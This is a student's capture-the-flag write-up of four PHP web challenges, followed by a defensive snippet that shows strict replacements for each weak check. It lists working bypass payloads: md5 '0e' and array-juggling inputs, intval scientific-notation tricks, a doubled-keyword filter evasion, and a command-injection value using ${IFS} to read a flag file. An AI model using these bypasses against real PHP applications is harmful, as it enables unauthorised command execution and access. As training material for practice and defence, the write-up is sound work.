Contents
① [NSSCTF 2022 Spring Recruit] babyphp
② [鶴城杯 2021] Middle magic
③ [WUSTCTF 2020] 樸實無華
④ [SWPUCTF 2022 新生賽] funny_php
Midterm exam tomorrow, so I'm tidying up a few small knowledge points first to calm down.
① [NSSCTF 2022 Spring Recruit] babyphp
payload:
?a[]=1&b1[]=1&b2[]=2&c1=s878926199a&c2=s155964671a
Too simple to need an explanation.
② [鶴城杯 2021] Middle magic
payload:
?aaa=%0apass_the_level_1%23
admin[]=1&root_pwd[]=2&level_3={result:0}
Note the json_decode on level_3 here: it is parsed as key/value pairs.
③ [WUSTCTF 2020] 樸實無華
Look at the source first.
The keyword "bot" is the hint.
Visit /robots.txt
Obviously a fake flag, but let's visit it anyway.
Sure enough, nothing there.
A directory scan turned up nothing new either.
Capture the traffic and look at the response headers.
(That is hidden awfully deep.)
Visit /f14g.php
According to how intval() works: when scientific notation is passed to the function as a string, the return value is the number in front of the exponent, whereas for scientific notation plus a number it returns the full value of the scientific-notation expression.
?num=2e4 bypasses it successfully.
About the md5 bypass:
md5=0e215962017
?num=2e4&md5=0e215962017&get_flag=ls
Output:
Spaces and cat are filtered (which is as good as no filter at all).
A simple bypass:
Final payload:
?num=2e4&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
④ [SWPUCTF 2022 新生賽] funny_php
Replacing the keyword with an empty string is bypassed by writing it twice; the rest is fairly standard, so here is the payload directly.
POST /?num=9e9&str=NSSNSSCTFCTF HTTP/1.1
Host: node5.anna.nssctf.cn:28491
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://node5.anna.nssctf.cn:28491/
Connection: close
Cookie: session=MTcwMDYzMTcyNnxEdi1CQkFFQ180SUFBUkFCRUFBQUhmLUNBQUVHYzNSeWFXNW5EQWdBQm5OdmJIWmxaQU5wYm5RRUFnQUF8t9dvoQKIlAnfzfb6ZJC50rfstdTr_SAkawzUZ9-gepw=; PHPSESSID=4e2a10fe298553aab03d80749522bc6a
Upgrade-Insecure-Requests: 1
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

md5_1=s214587387a&md5_2=s1502113478a
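The four writeups above all turn on the same PHP weak-typing habits. As an added example that is not part of the original writeup, the snippet below puts each weak check next to a version that closes the bypass, using the sample values quoted in the payloads; it assumes PHP 8 (for mixed and str_contains), and the function names are my own.

```php
<?php
// Added example, not from the original writeup: the weak PHP checks the
// four payloads above abuse, each beside a check that closes the bypass.
// Sample inputs are the values quoted in the writeup; assumes PHP 8.

// 1. "0e" digests: md5() of both strings is "0e<digits>", and loose ==
//    compares two such numeric strings as 0 == 0. hash_equals() compares bytes.
function weakMd5Pair(string $a, string $b): bool {
    return $a != $b && md5($a) == md5($b);
}
function strictMd5Pair(string $a, string $b): bool {
    return $a !== $b && hash_equals(md5($a), md5($b));
}

// 2. a[]=1 sends an array. md5() on an array returns null with a warning on
//    PHP 7 (so null == null passes) and throws on PHP 8; either way, refuse
//    anything that is not a string before it reaches the hash.
function asString(mixed $v): ?string {
    return is_string($v) ? $v : null;
}

// 3. intval('2e4'): PHP < 7.1 returns 2 while '2e4' + 1 is 20001, which is
//    what the num < 2020 && num + 1 > 2021 trick relies on; PHP >= 7.1
//    returns 20000. FILTER_VALIDATE_INT rejects exponent notation outright.
function strictInt(string $v): ?int {
    $i = filter_var($v, FILTER_VALIDATE_INT);
    return $i === false ? null : $i;
}

// 4. One pass of str_replace('NSSCTF', '', 'NSSNSSCTFCTF') reassembles the
//    banned token from the two halves. Reject the input instead of sanitising.
function rejectIfBanned(string $s, string $banned): ?string {
    return str_contains($s, $banned) ? null : $s;
}

var_dump(weakMd5Pair('s878926199a', 's155964671a'));
var_dump(strictMd5Pair('s878926199a', 's155964671a'));
var_dump(asString(['1']));
var_dump(strictInt('2e4'));
var_dump(str_replace('NSSCTF', '', 'NSSNSSCTFCTF'));
var_dump(rejectIfBanned('NSSNSSCTFCTF', 'NSSCTF'));
```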